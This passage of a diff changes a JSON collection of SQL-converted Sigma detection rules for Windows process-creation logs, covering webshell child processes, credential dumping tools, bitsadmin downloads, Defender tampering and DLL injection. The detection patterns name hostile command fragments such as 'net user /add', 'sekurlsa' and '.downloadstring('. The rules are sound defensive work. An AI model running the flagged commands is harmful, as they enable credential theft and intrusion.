This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", "tags": [ - "attack.collection", - "attack.t1005" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "status": "test", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_node_abuse.yml" - }, - { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", - "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "status": "experimental", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE 
'%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": 
"4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE 
'\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": 
"test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": 
"test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.005" + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1555.004" + ], + "falsepositives": [ + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "status": "experimental", - "description": "Detects 